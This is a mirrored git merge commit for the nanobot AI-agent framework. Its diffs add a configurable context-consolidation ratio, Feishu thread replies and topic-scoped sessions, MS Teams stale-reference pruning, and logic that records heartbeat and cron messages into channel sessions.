mirror of
https://github.com/HKUDS/nanobot.git
synced 2026-05-03 00:05:55 +00:00
Merge origin/main into webui-settings
Made-with: Cursor
This commit is contained in:
commit
65b0ae81af
@ -191,6 +191,7 @@ class AgentLoop:
|
||||
channels_config: ChannelsConfig | None = None,
|
||||
timezone: str | None = None,
|
||||
session_ttl_minutes: int = 0,
|
||||
consolidation_ratio: float = 0.5,
|
||||
hooks: list[AgentHook] | None = None,
|
||||
unified_session: bool = False,
|
||||
disabled_skills: list[str] | None = None,
|
||||
@ -274,6 +275,7 @@ class AgentLoop:
|
||||
build_messages=self.context.build_messages,
|
||||
get_tool_definitions=self.tools.get_definitions,
|
||||
max_completion_tokens=provider.generation.max_tokens,
|
||||
consolidation_ratio=consolidation_ratio,
|
||||
)
|
||||
self.auto_compact = AutoCompact(
|
||||
sessions=self.sessions,
|
||||
|
||||
@ -435,6 +435,7 @@ class Consolidator:
|
||||
build_messages: Callable[..., list[dict[str, Any]]],
|
||||
get_tool_definitions: Callable[[], list[dict[str, Any]]],
|
||||
max_completion_tokens: int = 4096,
|
||||
consolidation_ratio: float = 0.5,
|
||||
):
|
||||
self.store = store
|
||||
self.provider = provider
|
||||
@ -442,6 +443,7 @@ class Consolidator:
|
||||
self.sessions = sessions
|
||||
self.context_window_tokens = context_window_tokens
|
||||
self.max_completion_tokens = max_completion_tokens
|
||||
self.consolidation_ratio = consolidation_ratio
|
||||
self._build_messages = build_messages
|
||||
self._get_tool_definitions = get_tool_definitions
|
||||
self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = (
|
||||
@ -568,7 +570,7 @@ class Consolidator:
|
||||
lock = self.get_lock(session.key)
|
||||
async with lock:
|
||||
budget = self._input_token_budget
|
||||
target = budget // 2
|
||||
target = int(budget * self.consolidation_ratio)
|
||||
try:
|
||||
estimated, source = self.estimate_session_prompt_tokens(
|
||||
session,
|
||||
|
||||
@ -42,6 +42,10 @@ class MessageTool(Tool):
|
||||
default=default_message_id,
|
||||
)
|
||||
self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False)
|
||||
self._record_channel_delivery_var: ContextVar[bool] = ContextVar(
|
||||
"message_record_channel_delivery",
|
||||
default=False,
|
||||
)
|
||||
|
||||
def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
|
||||
"""Set the current message context."""
|
||||
@ -57,6 +61,14 @@ class MessageTool(Tool):
|
||||
"""Reset per-turn send tracking."""
|
||||
self._sent_in_turn = False
|
||||
|
||||
def set_record_channel_delivery(self, active: bool):
|
||||
"""Mark tool-sent messages as proactive channel deliveries."""
|
||||
return self._record_channel_delivery_var.set(active)
|
||||
|
||||
def reset_record_channel_delivery(self, token) -> None:
|
||||
"""Restore previous proactive delivery recording state."""
|
||||
self._record_channel_delivery_var.reset(token)
|
||||
|
||||
@property
|
||||
def _sent_in_turn(self) -> bool:
|
||||
return self._sent_in_turn_var.get()
|
||||
@ -117,15 +129,19 @@ class MessageTool(Tool):
|
||||
if not self._send_callback:
|
||||
return "Error: Message sending not configured"
|
||||
|
||||
metadata = {
|
||||
"message_id": message_id,
|
||||
} if message_id else {}
|
||||
if self._record_channel_delivery_var.get():
|
||||
metadata["_record_channel_delivery"] = True
|
||||
|
||||
msg = OutboundMessage(
|
||||
channel=channel,
|
||||
chat_id=chat_id,
|
||||
content=content,
|
||||
media=media or [],
|
||||
buttons=buttons or [],
|
||||
metadata={
|
||||
"message_id": message_id,
|
||||
} if message_id else {},
|
||||
metadata=metadata,
|
||||
)
|
||||
|
||||
try:
|
||||
|
||||
@ -136,9 +136,10 @@ class ExecTool(Tool):
|
||||
|
||||
if self.path_append:
|
||||
if _IS_WINDOWS:
|
||||
env["PATH"] = env.get("PATH", "") + ";" + self.path_append
|
||||
env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
|
||||
else:
|
||||
command = f'export PATH="$PATH:{self.path_append}"; {command}'
|
||||
env["NANOBOT_PATH_APPEND"] = self.path_append
|
||||
command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}'
|
||||
|
||||
try:
|
||||
process = await self._spawn(command, cwd, env)
|
||||
@ -298,8 +299,8 @@ class ExecTool(Tool):
|
||||
continue
|
||||
|
||||
media_path = get_media_dir().resolve()
|
||||
if (p.is_absolute()
|
||||
and cwd_path not in p.parents
|
||||
if (p.is_absolute()
|
||||
and cwd_path not in p.parents
|
||||
and p != cwd_path
|
||||
and media_path not in p.parents
|
||||
and p != media_path
|
||||
|
||||
@ -13,6 +13,7 @@ from dataclasses import dataclass
|
||||
from typing import Any, Literal
|
||||
|
||||
from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1
|
||||
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
|
||||
from loguru import logger
|
||||
from pydantic import Field
|
||||
|
||||
@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel
|
||||
from nanobot.config.paths import get_media_dir
|
||||
from nanobot.config.schema import Base
|
||||
|
||||
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
|
||||
|
||||
FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None
|
||||
|
||||
# Message type display mapping
|
||||
@ -308,6 +307,8 @@ class FeishuChannel(BaseChannel):
|
||||
self._loop: asyncio.AbstractEventLoop | None = None
|
||||
self._stream_bufs: dict[str, _FeishuStreamBuf] = {}
|
||||
self._bot_open_id: str | None = None
|
||||
self._background_tasks: set[asyncio.Task] = set()
|
||||
self._reaction_ids: dict[str, str] = {} # message_id → reaction_id
|
||||
|
||||
@staticmethod
|
||||
def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any:
|
||||
@ -549,8 +550,11 @@ class FeishuChannel(BaseChannel):
|
||||
return None
|
||||
|
||||
async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None:
|
||||
"""
|
||||
Add a reaction emoji to a message (non-blocking).
|
||||
"""Add a reaction emoji to a message.
|
||||
|
||||
Returns the reaction_id on success, None on failure.
|
||||
When called via a tracked background task, the returned reaction_id
|
||||
is stored in ``_reaction_ids`` for later cleanup by ``send_delta``.
|
||||
|
||||
Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART
|
||||
"""
|
||||
@ -594,6 +598,36 @@ class FeishuChannel(BaseChannel):
|
||||
loop = asyncio.get_running_loop()
|
||||
await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id)
|
||||
|
||||
def _on_background_task_done(self, task: asyncio.Task) -> None:
|
||||
"""Callback: remove from tracking set and log unhandled exceptions."""
|
||||
self._background_tasks.discard(task)
|
||||
if task.cancelled():
|
||||
return
|
||||
try:
|
||||
task.result()
|
||||
except Exception as exc:
|
||||
logger.warning("Background task failed: {}", exc)
|
||||
|
||||
def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None:
|
||||
"""Callback: store reaction_id after background add-reaction completes."""
|
||||
if task.cancelled():
|
||||
return
|
||||
try:
|
||||
reaction_id = task.result()
|
||||
if reaction_id:
|
||||
self._reaction_ids[message_id] = reaction_id
|
||||
except Exception:
|
||||
pass # already logged by _on_background_task_done
|
||||
# Trim cache to prevent unbounded growth
|
||||
if len(self._reaction_ids) > 500:
|
||||
self._reaction_ids.pop(next(iter(self._reaction_ids)))
|
||||
|
||||
@staticmethod
|
||||
def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str:
|
||||
"""Scope streaming buffers to the inbound message when available."""
|
||||
meta = metadata or {}
|
||||
return meta.get("message_id") or chat_id
|
||||
|
||||
# Regex to match markdown tables (header + separator + data rows)
|
||||
_TABLE_RE = re.compile(
|
||||
r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)",
|
||||
@ -1101,17 +1135,23 @@ class FeishuChannel(BaseChannel):
|
||||
logger.debug("Feishu: error fetching parent message {}: {}", message_id, e)
|
||||
return None
|
||||
|
||||
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool:
|
||||
"""Reply to an existing Feishu message using the Reply API (synchronous)."""
|
||||
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool:
|
||||
"""Reply to an existing Feishu message using the Reply API (synchronous).
|
||||
|
||||
Args:
|
||||
reply_in_thread: If True, reply as a thread/topic message
|
||||
in the Feishu client.
|
||||
"""
|
||||
from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody
|
||||
|
||||
try:
|
||||
body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content)
|
||||
if reply_in_thread:
|
||||
body_builder = body_builder.reply_in_thread(True)
|
||||
request = (
|
||||
ReplyMessageRequest.builder()
|
||||
.message_id(parent_message_id)
|
||||
.request_body(
|
||||
ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build()
|
||||
)
|
||||
.request_body(body_builder.build())
|
||||
.build()
|
||||
)
|
||||
response = self._client.im.v1.message.reply(request)
|
||||
@ -1166,8 +1206,19 @@ class FeishuChannel(BaseChannel):
|
||||
logger.error("Error sending Feishu {} message: {}", msg_type, e)
|
||||
return None
|
||||
|
||||
def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None:
|
||||
"""Create a CardKit streaming card, send it to chat, return card_id."""
|
||||
def _create_streaming_card_sync(
|
||||
self,
|
||||
receive_id_type: str,
|
||||
chat_id: str,
|
||||
reply_message_id: str | None = None,
|
||||
) -> str | None:
|
||||
"""Create a CardKit streaming card, send it to chat, return card_id.
|
||||
|
||||
When *reply_message_id* is provided the card is delivered via the
|
||||
reply API (with reply_in_thread=True) so it lands inside the
|
||||
originating thread / topic. Otherwise the plain create-message
|
||||
API is used.
|
||||
"""
|
||||
from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody
|
||||
|
||||
card_json = {
|
||||
@ -1196,13 +1247,19 @@ class FeishuChannel(BaseChannel):
|
||||
return None
|
||||
card_id = getattr(response.data, "card_id", None)
|
||||
if card_id:
|
||||
message_id = self._send_message_sync(
|
||||
receive_id_type,
|
||||
chat_id,
|
||||
"interactive",
|
||||
json.dumps({"type": "card", "data": {"card_id": card_id}}),
|
||||
card_content = json.dumps(
|
||||
{"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False
|
||||
)
|
||||
if message_id:
|
||||
if reply_message_id:
|
||||
sent = self._reply_message_sync(
|
||||
reply_message_id, "interactive", card_content,
|
||||
reply_in_thread=True,
|
||||
)
|
||||
else:
|
||||
sent = self._send_message_sync(
|
||||
receive_id_type, chat_id, "interactive", card_content,
|
||||
) is not None
|
||||
if sent:
|
||||
return card_id
|
||||
logger.warning(
|
||||
"Created streaming card {} but failed to send it to {}", card_id, chat_id
|
||||
@ -1292,23 +1349,27 @@ class FeishuChannel(BaseChannel):
|
||||
_stream_end: Finalize the streaming card.
|
||||
_tool_hint: Delta is a formatted tool hint (for display only).
|
||||
message_id: Original message id (used with _stream_end for reaction cleanup).
|
||||
reaction_id: Reaction id to remove on stream end.
|
||||
chat_type: "group" or "p2p" — controls reply-in-thread for streaming cards.
|
||||
"""
|
||||
if not self._client:
|
||||
return
|
||||
meta = metadata or {}
|
||||
stream_key = self._stream_key(chat_id, meta)
|
||||
loop = asyncio.get_running_loop()
|
||||
rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id"
|
||||
|
||||
# --- stream end: final update or fallback ---
|
||||
if meta.get("_stream_end"):
|
||||
if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")):
|
||||
await self._remove_reaction(message_id, reaction_id)
|
||||
message_id = meta.get("message_id")
|
||||
if message_id:
|
||||
reaction_id = self._reaction_ids.pop(message_id, None)
|
||||
if reaction_id:
|
||||
await self._remove_reaction(message_id, reaction_id)
|
||||
# Add completion emoji if configured
|
||||
if self.config.done_emoji and message_id:
|
||||
if self.config.done_emoji:
|
||||
await self._add_reaction(message_id, self.config.done_emoji)
|
||||
|
||||
buf = self._stream_bufs.pop(chat_id, None)
|
||||
buf = self._stream_bufs.pop(stream_key, None)
|
||||
if not buf or not buf.text:
|
||||
return
|
||||
# Try to finalize via streaming card; if that fails (e.g.
|
||||
@ -1343,24 +1404,45 @@ class FeishuChannel(BaseChannel):
|
||||
{"config": {"wide_screen_mode": True}, "elements": chunk},
|
||||
ensure_ascii=False,
|
||||
)
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, rid_type, chat_id, "interactive", card
|
||||
)
|
||||
# Fallback: reply via the Reply API for group chats.
|
||||
# Target message_id — the Feishu API keeps the reply in
|
||||
# the same topic automatically.
|
||||
_f_msg = meta.get("message_id")
|
||||
fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None
|
||||
if fallback_msg_id:
|
||||
await loop.run_in_executor(
|
||||
None, lambda: self._reply_message_sync(
|
||||
fallback_msg_id, "interactive", card,
|
||||
reply_in_thread=True,
|
||||
),
|
||||
)
|
||||
else:
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, rid_type, chat_id, "interactive", card
|
||||
)
|
||||
return
|
||||
|
||||
# --- accumulate delta ---
|
||||
buf = self._stream_bufs.get(chat_id)
|
||||
buf = self._stream_bufs.get(stream_key)
|
||||
if buf is None:
|
||||
buf = _FeishuStreamBuf()
|
||||
self._stream_bufs[chat_id] = buf
|
||||
self._stream_bufs[stream_key] = buf
|
||||
buf.text += delta
|
||||
if not buf.text.strip():
|
||||
return
|
||||
|
||||
now = time.monotonic()
|
||||
if buf.card_id is None:
|
||||
# Send the streaming card as a reply for group chats so it
|
||||
# lands inside the originating topic/thread. Always target
|
||||
# message_id (the actual inbound message) — the Feishu Reply
|
||||
# API keeps the response in the same topic automatically.
|
||||
is_group = meta.get("chat_type", "group") == "group"
|
||||
reply_msg_id = meta.get("message_id") if is_group else None
|
||||
card_id = await loop.run_in_executor(
|
||||
None, self._create_streaming_card_sync, rid_type, chat_id
|
||||
None,
|
||||
self._create_streaming_card_sync,
|
||||
rid_type, chat_id, reply_msg_id,
|
||||
)
|
||||
if card_id:
|
||||
buf.card_id = card_id
|
||||
@ -1393,7 +1475,7 @@ class FeishuChannel(BaseChannel):
|
||||
hint = (msg.content or "").strip()
|
||||
if not hint:
|
||||
return
|
||||
buf = self._stream_bufs.get(msg.chat_id)
|
||||
buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata))
|
||||
if buf and buf.card_id:
|
||||
# Delegate to send_delta so tool hints get the same
|
||||
# throttling (and card creation) as regular text deltas.
|
||||
@ -1404,37 +1486,59 @@ class FeishuChannel(BaseChannel):
|
||||
return
|
||||
# No active streaming card — send as a regular
|
||||
# interactive card with the same 🔧 prefix style.
|
||||
# Use reply API for group chats so the hint stays in topic.
|
||||
card = json.dumps(
|
||||
{"config": {"wide_screen_mode": True}, "elements": [
|
||||
{"tag": "markdown", "content": self._format_tool_hint_delta(hint)},
|
||||
]},
|
||||
ensure_ascii=False,
|
||||
)
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
|
||||
)
|
||||
_th_msg_id = msg.metadata.get("message_id")
|
||||
_th_chat_type = msg.metadata.get("chat_type", "group")
|
||||
if _th_msg_id and _th_chat_type == "group":
|
||||
await loop.run_in_executor(
|
||||
None, lambda: self._reply_message_sync(
|
||||
_th_msg_id, "interactive", card,
|
||||
reply_in_thread=True,
|
||||
),
|
||||
)
|
||||
else:
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
|
||||
)
|
||||
return
|
||||
|
||||
# Determine whether the first message should quote the user's message.
|
||||
# Only the very first send (media or text) in this call uses reply; subsequent
|
||||
# chunks/media fall back to plain create to avoid redundant quote bubbles.
|
||||
# Always target message_id — the Feishu Reply API keeps replies in the
|
||||
# same topic automatically when the target message is inside a topic.
|
||||
reply_message_id: str | None = None
|
||||
_msg_id = msg.metadata.get("message_id")
|
||||
if self.config.reply_to_message and not msg.metadata.get("_progress", False):
|
||||
reply_message_id = msg.metadata.get("message_id") or None
|
||||
reply_message_id = _msg_id
|
||||
# For topic group messages, always reply to keep context in thread
|
||||
elif msg.metadata.get("thread_id"):
|
||||
reply_message_id = (
|
||||
msg.metadata.get("root_id") or msg.metadata.get("message_id") or None
|
||||
)
|
||||
reply_message_id = _msg_id
|
||||
|
||||
first_send = True # tracks whether the reply has already been used
|
||||
|
||||
def _do_send(m_type: str, content: str) -> None:
|
||||
"""Send via reply (first message) or create (subsequent)."""
|
||||
"""Send via reply (first message) or create (subsequent).
|
||||
|
||||
For group chats the reply API always uses reply_in_thread=True.
|
||||
The Feishu API automatically keeps replies inside existing
|
||||
topics — reply_in_thread only creates a *new* topic when the
|
||||
target message is a plain (non-topic) message.
|
||||
"""
|
||||
nonlocal first_send
|
||||
if reply_message_id and first_send:
|
||||
first_send = False
|
||||
ok = self._reply_message_sync(reply_message_id, m_type, content)
|
||||
chat_type = msg.metadata.get("chat_type", "group")
|
||||
ok = self._reply_message_sync(
|
||||
reply_message_id, m_type, content,
|
||||
reply_in_thread=chat_type == "group",
|
||||
)
|
||||
if ok:
|
||||
return
|
||||
# Fall back to regular send if reply fails
|
||||
@ -1543,8 +1647,13 @@ class FeishuChannel(BaseChannel):
|
||||
logger.debug("Feishu: skipping group message (not mentioned)")
|
||||
return
|
||||
|
||||
# Add reaction
|
||||
reaction_id = await self._add_reaction(message_id, self.config.react_emoji)
|
||||
# Add reaction (non-blocking — tracked background task)
|
||||
task = asyncio.create_task(
|
||||
self._add_reaction(message_id, self.config.react_emoji)
|
||||
)
|
||||
self._background_tasks.add(task)
|
||||
task.add_done_callback(self._on_background_task_done)
|
||||
task.add_done_callback(lambda t: self._on_reaction_added(message_id, t))
|
||||
|
||||
# Parse content
|
||||
content_parts = []
|
||||
@ -1624,6 +1733,15 @@ class FeishuChannel(BaseChannel):
|
||||
if not content and not media_paths:
|
||||
return
|
||||
|
||||
# Build topic-scoped session key for conversation isolation.
|
||||
# Group chat: each topic gets its own session via root_id (replies
|
||||
# inside a topic) or message_id (top-level messages start a new topic).
|
||||
# Private chat: no override — same behavior as Telegram/Slack.
|
||||
if chat_type == "group":
|
||||
session_key = f"feishu:{chat_id}:{root_id or message_id}"
|
||||
else:
|
||||
session_key = None
|
||||
|
||||
# Forward to message bus
|
||||
reply_to = chat_id if chat_type == "group" else sender_id
|
||||
await self._handle_message(
|
||||
@ -1633,13 +1751,13 @@ class FeishuChannel(BaseChannel):
|
||||
media=media_paths,
|
||||
metadata={
|
||||
"message_id": message_id,
|
||||
"reaction_id": reaction_id,
|
||||
"chat_type": chat_type,
|
||||
"msg_type": msg_type,
|
||||
"parent_id": parent_id,
|
||||
"root_id": root_id,
|
||||
"thread_id": thread_id,
|
||||
},
|
||||
session_key=session_key,
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
|
||||
@ -70,6 +70,7 @@ class ConversationRef:
|
||||
activity_id: str | None = None
|
||||
conversation_type: str | None = None
|
||||
tenant_id: str | None = None
|
||||
updated_at: float | None = None
|
||||
|
||||
|
||||
class MSTeamsChannel(BaseChannel):
|
||||
@ -220,7 +221,6 @@ class MSTeamsChannel(BaseChannel):
|
||||
token = await self._get_access_token()
|
||||
base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities"
|
||||
use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id)
|
||||
url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url
|
||||
headers = {
|
||||
"Authorization": f"Bearer {token}",
|
||||
"Content-Type": "application/json",
|
||||
@ -233,7 +233,7 @@ class MSTeamsChannel(BaseChannel):
|
||||
payload["replyToId"] = ref.activity_id
|
||||
|
||||
try:
|
||||
resp = await self._http.post(url, headers=headers, json=payload)
|
||||
resp = await self._http.post(base_url, headers=headers, json=payload)
|
||||
resp.raise_for_status()
|
||||
logger.info("MSTeams message sent to {}", ref.conversation_id)
|
||||
except Exception as e:
|
||||
@ -289,7 +289,9 @@ class MSTeamsChannel(BaseChannel):
|
||||
activity_id=activity_id or None,
|
||||
conversation_type=conversation_type or None,
|
||||
tenant_id=str((channel_data.get("tenant") or {}).get("id") or "") or None,
|
||||
updated_at=time.time(),
|
||||
)
|
||||
|
||||
self._save_refs()
|
||||
|
||||
await self._handle_message(
|
||||
@ -310,10 +312,12 @@ class MSTeamsChannel(BaseChannel):
|
||||
"""Extract the user-authored text from a Teams activity."""
|
||||
text = str(activity.get("text") or "")
|
||||
text = self._strip_possible_bot_mention(text)
|
||||
text = self._normalize_html_whitespace(text)
|
||||
|
||||
channel_data = activity.get("channelData") or {}
|
||||
reply_to_id = str(activity.get("replyToId") or "").strip()
|
||||
normalized_preview = html.unescape(text).replace("&rsquo", "’").strip()
|
||||
normalized_preview = normalized_preview.replace("\xa0", " ")
|
||||
normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n")
|
||||
preview_lines = [line.strip() for line in normalized_preview.split("\n")]
|
||||
while preview_lines and not preview_lines[0]:
|
||||
@ -333,9 +337,15 @@ class MSTeamsChannel(BaseChannel):
|
||||
cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned)
|
||||
return cleaned.strip()
|
||||
|
||||
def _normalize_html_whitespace(self, text: str) -> str:
|
||||
"""Normalize common HTML whitespace/entities from Teams into plain text spacing."""
|
||||
normalized = html.unescape(text).replace("&rsquo", "’")
|
||||
normalized = normalized.replace("\xa0", " ")
|
||||
return normalized
|
||||
|
||||
def _normalize_teams_reply_quote(self, text: str) -> str:
|
||||
"""Normalize Teams quoted replies into a compact structured form."""
|
||||
cleaned = html.unescape(text).replace("&rsquo", "’").strip()
|
||||
cleaned = self._normalize_html_whitespace(text).strip()
|
||||
if not cleaned:
|
||||
return ""
|
||||
|
||||
@ -494,6 +504,14 @@ class MSTeamsChannel(BaseChannel):
|
||||
def _save_refs(self) -> None:
|
||||
"""Persist conversation references."""
|
||||
try:
|
||||
stale_keys = [
|
||||
key
|
||||
for key, ref in self._conversation_refs.items()
|
||||
if self._is_stale_or_unsupported_ref(ref)
|
||||
]
|
||||
for key in stale_keys:
|
||||
self._conversation_refs.pop(key, None)
|
||||
|
||||
data = {
|
||||
key: {
|
||||
"service_url": ref.service_url,
|
||||
@ -502,6 +520,7 @@ class MSTeamsChannel(BaseChannel):
|
||||
"activity_id": ref.activity_id,
|
||||
"conversation_type": ref.conversation_type,
|
||||
"tenant_id": ref.tenant_id,
|
||||
"updated_at": ref.updated_at,
|
||||
}
|
||||
for key, ref in self._conversation_refs.items()
|
||||
}
|
||||
@ -509,6 +528,21 @@ class MSTeamsChannel(BaseChannel):
|
||||
except Exception as e:
|
||||
logger.warning("Failed to save MSTeams conversation refs: {}", e)
|
||||
|
||||
def _is_stale_or_unsupported_ref(self, ref: ConversationRef) -> bool:
|
||||
"""Reject unsupported refs and prune old refs."""
|
||||
service_url = (ref.service_url or "").strip().lower()
|
||||
conversation_type = (ref.conversation_type or "").strip().lower()
|
||||
updated_at = ref.updated_at or 0.0
|
||||
max_age_seconds = 30 * 24 * 60 * 60
|
||||
|
||||
if "webchat.botframework.com" in service_url:
|
||||
return True
|
||||
if conversation_type and conversation_type != "personal":
|
||||
return True
|
||||
if updated_at and updated_at < time.time() - max_age_seconds:
|
||||
return True
|
||||
return False
|
||||
|
||||
async def _get_access_token(self) -> str:
|
||||
"""Fetch an access token for Bot Framework / Azure Bot auth."""
|
||||
|
||||
|
||||
@ -537,6 +537,7 @@ def serve(
|
||||
unified_session=runtime_config.agents.defaults.unified_session,
|
||||
disabled_skills=runtime_config.agents.defaults.disabled_skills,
|
||||
session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes,
|
||||
consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio,
|
||||
tools_config=runtime_config.tools,
|
||||
)
|
||||
|
||||
@ -597,6 +598,8 @@ def _run_gateway(
|
||||
"""Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up."""
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.agent.runtime import build_agent_runtime, load_agent_runtime
|
||||
from nanobot.agent.tools.cron import CronTool
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.channels.manager import ChannelManager
|
||||
from nanobot.cron.service import CronService
|
||||
@ -647,11 +650,52 @@ def _run_gateway(
|
||||
unified_session=config.agents.defaults.unified_session,
|
||||
disabled_skills=config.agents.defaults.disabled_skills,
|
||||
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
||||
consolidation_ratio=config.agents.defaults.consolidation_ratio,
|
||||
tools_config=config.tools,
|
||||
runtime_loader=load_agent_runtime,
|
||||
runtime_signature=runtime.signature,
|
||||
)
|
||||
|
||||
from nanobot.agent.loop import UNIFIED_SESSION_KEY
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
|
||||
def _channel_session_key(channel: str, chat_id: str) -> str:
|
||||
return (
|
||||
UNIFIED_SESSION_KEY
|
||||
if config.agents.defaults.unified_session
|
||||
else f"{channel}:{chat_id}"
|
||||
)
|
||||
|
||||
async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = False) -> None:
|
||||
"""Publish a user-visible message and mirror it into that channel's session."""
|
||||
metadata = dict(msg.metadata or {})
|
||||
record = record or bool(metadata.pop("_record_channel_delivery", False))
|
||||
if metadata != (msg.metadata or {}):
|
||||
msg = OutboundMessage(
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
content=msg.content,
|
||||
reply_to=msg.reply_to,
|
||||
media=msg.media,
|
||||
metadata=metadata,
|
||||
buttons=msg.buttons,
|
||||
)
|
||||
if (
|
||||
record
|
||||
and msg.channel != "cli"
|
||||
and msg.content.strip()
|
||||
and hasattr(session_manager, "get_or_create")
|
||||
and hasattr(session_manager, "save")
|
||||
):
|
||||
session = session_manager.get_or_create(_channel_session_key(msg.channel, msg.chat_id))
|
||||
session.add_message("assistant", msg.content, _channel_delivery=True)
|
||||
session_manager.save(session)
|
||||
await bus.publish_outbound(msg)
|
||||
|
||||
message_tool = getattr(agent, "tools", {}).get("message")
|
||||
if isinstance(message_tool, MessageTool):
|
||||
message_tool.set_send_callback(_deliver_to_channel)
|
||||
|
||||
# Set cron callback (needs agent)
|
||||
async def on_cron_job(job: CronJob) -> str | None:
|
||||
"""Execute a cron job through the agent."""
|
||||
@ -664,8 +708,6 @@ def _run_gateway(
|
||||
logger.exception("Dream cron job failed")
|
||||
return None
|
||||
|
||||
from nanobot.agent.tools.cron import CronTool
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.utils.evaluator import evaluate_response
|
||||
|
||||
reminder_note = (
|
||||
@ -682,6 +724,10 @@ def _run_gateway(
|
||||
async def _silent(*_args, **_kwargs):
|
||||
pass
|
||||
|
||||
message_record_token = None
|
||||
if isinstance(message_tool, MessageTool):
|
||||
message_record_token = message_tool.set_record_channel_delivery(True)
|
||||
|
||||
try:
|
||||
resp = await agent.process_direct(
|
||||
reminder_note,
|
||||
@ -693,10 +739,11 @@ def _run_gateway(
|
||||
finally:
|
||||
if isinstance(cron_tool, CronTool) and cron_token is not None:
|
||||
cron_tool.reset_cron_context(cron_token)
|
||||
if isinstance(message_tool, MessageTool) and message_record_token is not None:
|
||||
message_tool.reset_record_channel_delivery(message_record_token)
|
||||
|
||||
response = resp.content if resp else ""
|
||||
|
||||
message_tool = agent.tools.get("message")
|
||||
if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn:
|
||||
return response
|
||||
|
||||
@ -705,12 +752,14 @@ def _run_gateway(
|
||||
response, reminder_note, provider, agent.model,
|
||||
)
|
||||
if should_notify:
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
await bus.publish_outbound(OutboundMessage(
|
||||
channel=job.payload.channel or "cli",
|
||||
chat_id=job.payload.to,
|
||||
content=response,
|
||||
))
|
||||
await _deliver_to_channel(
|
||||
OutboundMessage(
|
||||
channel=job.payload.channel or "cli",
|
||||
chat_id=job.payload.to,
|
||||
content=response,
|
||||
),
|
||||
record=True,
|
||||
)
|
||||
return response
|
||||
|
||||
cron.on_job = on_cron_job
|
||||
@ -760,12 +809,22 @@ def _run_gateway(
|
||||
return resp.content if resp else ""
|
||||
|
||||
async def on_heartbeat_notify(response: str) -> None:
|
||||
"""Deliver a heartbeat response to the user's channel."""
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
"""Deliver a heartbeat response to the user's channel.
|
||||
|
||||
In addition to publishing the outbound message, this injects the
|
||||
delivered text as an assistant turn into the *target channel's*
|
||||
session. Without this, a user reply on the channel (e.g. "Sure")
|
||||
lands in a session that has no context about the heartbeat message
|
||||
and the agent cannot follow through.
|
||||
"""
|
||||
channel, chat_id = _pick_heartbeat_target()
|
||||
if channel == "cli":
|
||||
return # No external channel available to deliver to
|
||||
await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response))
|
||||
|
||||
await _deliver_to_channel(
|
||||
OutboundMessage(channel=channel, chat_id=chat_id, content=response),
|
||||
record=True,
|
||||
)
|
||||
|
||||
hb_cfg = config.gateway.heartbeat
|
||||
heartbeat = HeartbeatService(
|
||||
@ -968,6 +1027,7 @@ def agent(
|
||||
unified_session=config.agents.defaults.unified_session,
|
||||
disabled_skills=config.agents.defaults.disabled_skills,
|
||||
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
||||
consolidation_ratio=config.agents.defaults.consolidation_ratio,
|
||||
tools_config=config.tools,
|
||||
)
|
||||
restart_notice = consume_restart_notice_from_env()
|
||||
|
||||
